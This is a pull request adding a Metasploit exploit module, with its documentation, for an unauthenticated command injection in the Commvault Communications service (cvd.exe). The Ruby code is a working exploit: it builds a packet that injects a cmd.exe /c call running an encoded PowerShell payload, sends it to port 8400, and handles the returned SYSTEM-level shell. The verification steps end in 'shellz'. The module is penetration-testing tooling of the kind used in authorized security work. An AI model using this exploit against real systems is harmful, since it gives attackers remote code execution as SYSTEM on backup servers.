### PR TITLE
Commvault Remote Command Injection

### DIFF
--- a/documentation/modules/exploit/windows/misc/commvault_cmd_exec.md
+++ b/documentation/modules/exploit/windows/misc/commvault_cmd_exec.md
@@ -1,0 +1,21 @@
+## Vulnerable Application
+
+
+This module exploits a remote command injection vulnerability in the Commvault Communications service (cvd.exe). Exploitation of this vulnerability can allow for remote command execution as SYSTEM.
+
+
+Additional information can be found [here](https://www.securifera.com/advisories/sec-2017-0001/)
+
+
+
+## Verification Steps
+
+1. Start msfconsole
+
+2. `use exploit/windows/misc/commvault_cmd_exec`
+
+3. `set RHOST [ip]`
+
+4. `exploit`
+
+5. shellz :)

--- a/modules/exploits/windows/misc/commvault_cmd_exec.rb
+++ b/modules/exploits/windows/misc/commvault_cmd_exec.rb
@@ -40,26 +40,22 @@ class MetasploitModule < Msf::Exploit::Remote
             }
           ],
         ],
-      'Privileged'     => false,
+      'Privileged'     => true,
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'Dec 12 2017'))
 
-      register_options(
-        [
-          Opt::RPORT(8400),
-        ])
+      register_options([Opt::RPORT(8400)])
+
     end
 
   def exploit 
 
-    print_status("Executing payload")
-    buf = build_exploit()   
-
+    buf = build_exploit
+    print_status("Connecting to Commvault Communications Service.")
     connect
-    print_status("Connected to Commvault Communications Service.")
+    print_status("Executing payload")
     #Send the payload
     sock.put(buf)
-    
     #Handle the shell
     handler
     disconnect
@@ -67,10 +63,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
 
-  def build_exploit()
-    
-    ret_data = ''
-
+  def build_exploit
+ 
     #Get encoded powershell of payload
     command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, method: 'reflection')
     #Remove additional cmd.exe call
@@ -79,7 +73,7 @@ class MetasploitModule < Msf::Exploit::Remote
     command = command[(idx)..-1]
    
     #Build packet
-    cmd_path = "C:\\Windows\\System32\\cmd.exe"
+    cmd_path = 'C:\Windows\System32\cmd.exe'
     msg_type = 9
     zero = 0
     payload = ""
@@ -96,9 +90,9 @@ class MetasploitModule < Msf::Exploit::Remote
     
     #Add length header and payload
     ret_data = [payload.length].pack('I>')
-    ret_data += payload    
+    ret_data += payload
 
-    return ret_data
+    ret_data
 
   end
 end

--- a/modules/exploits/windows/misc/commvault_cmd_exec.rb
+++ b/modules/exploits/windows/misc/commvault_cmd_exec.rb
@@ -71,7 +71,7 @@ class MetasploitModule < Msf::Exploit::Remote
     psh = "powershell"
     idx = command.index(psh)
     command = command[(idx)..-1]
-  
+
     #Build packet
     cmd_path = 'C:\Windows\System32\cmd.exe'
     msg_type = 9

--- a/modules/exploits/windows/misc/commvault_cmd_exec.rb
+++ b/modules/exploits/windows/misc/commvault_cmd_exec.rb
@@ -18,8 +18,8 @@ class MetasploitModule < Msf::Exploit::Remote
         discovered in Commvault Service v11 SP5 and earlier versions (tested in v11 SP5
         and v10). The vulnerability exists in the cvd.exe service and allows an
         attacker to execute arbitrary commands in the context of the service. By
-        default, the Commvault Communications service installs and runs as SYSTEM in 
-        Windows and does not require authentication. This vulnerability was discovered 
+        default, the Commvault Communications service installs and runs as SYSTEM in
+        Windows and does not require authentication. This vulnerability was discovered
         in the Windows version. The Linux version wasn't tested.
       },
       'License'        => MSF_LICENSE,
@@ -48,7 +48,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     end
 
-  def exploit 
+  def exploit
 
     buf = build_exploit
     print_status("Connecting to Commvault Communications Service.")
@@ -64,14 +64,14 @@ class MetasploitModule < Msf::Exploit::Remote
 
 
   def build_exploit
- 
+
     #Get encoded powershell of payload
     command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, method: 'reflection')
     #Remove additional cmd.exe call
     psh = "powershell"
     idx = command.index(psh)
     command = command[(idx)..-1]
-   
+  
     #Build packet
     cmd_path = 'C:\Windows\System32\cmd.exe'
     msg_type = 9
@@ -87,7 +87,7 @@ class MetasploitModule < Msf::Exploit::Remote
     payload += '" && echo '
     payload += "\x00"
     payload += [zero].pack('I>')
-    
+
     #Add length header and payload
     ret_data = [payload.length].pack('I>')
     ret_data += payload

--- a/modules/exploits/windows/misc/commvault_cmd_exec.rb
+++ b/modules/exploits/windows/misc/commvault_cmd_exec.rb
@@ -1,0 +1,104 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/exploit/powershell'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GoodRanking
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Powershell
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'Commvault Communications Service (cvd) Command Injection',
+      'Description'    => %q{
+        This module exploits a command injection vulnerability
+        discovered in Commvault Service v11 SP5 and earlier versions (tested in v11 SP5
+        and v10). The vulnerability exists in the cvd.exe service and allows an
+        attacker to execute arbitrary commands in the context of the service. By
+        default, the Commvault Communications service installs and runs as SYSTEM in 
+        Windows and does not require authentication. This vulnerability was discovered 
+        in the Windows version. The Linux version wasn't tested.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'b0yd', # @rwincey / Vulnerability Discovery and MSF module author
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://www.securifera.com/advisories/sec-2017-0001/']
+        ],
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Commvault Communications Service (cvd) / Microsoft Windows 7 and higher',
+            {
+              'Arch' => [ARCH_X64, ARCH_X86]
+            }
+          ],
+        ],
+      'Privileged'     => false,
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Dec 12 2017'))
+
+      register_options(
+        [
+          Opt::RPORT(8400),
+        ])
+    end
+
+  def exploit 
+
+    print_status("Executing payload")
+    buf = build_exploit()   
+
+    connect
+    print_status("Connected to Commvault Communications Service.")
+    #Send the payload
+    sock.put(buf)
+    
+    #Handle the shell
+    handler
+    disconnect
+
+  end
+
+
+  def build_exploit()
+    
+    ret_data = ''
+
+    #Get encoded powershell of payload
+    command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, method: 'reflection')
+    #Remove additional cmd.exe call
+    psh = "powershell"
+    idx = command.index(psh)
+    command = command[(idx)..-1]
+   
+    #Build packet
+    cmd_path = "C:\\Windows\\System32\\cmd.exe"
+    msg_type = 9
+    zero = 0
+    payload = ""
+    payload += make_nops(8)
+    payload += [msg_type].pack('I>')
+    payload += make_nops(328)
+    payload += cmd_path
+    payload += ";"
+    payload += ' /c "'
+    payload += command
+    payload += '" && echo '
+    payload += "\x00"
+    payload += [zero].pack('I>')
+    
+    #Add length header and payload
+    ret_data = [payload.length].pack('I>')
+    ret_data += payload    
+
+    return ret_data
+
+  end
+end


### PR DESCRIPTION
Command Injection Exploit for Commvault Communications Service (cvd) v11 SP5 and earlier versions

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use exploit/windows/misc/commvault_cmd_exec `
- [x] ...
- [x] Shellz

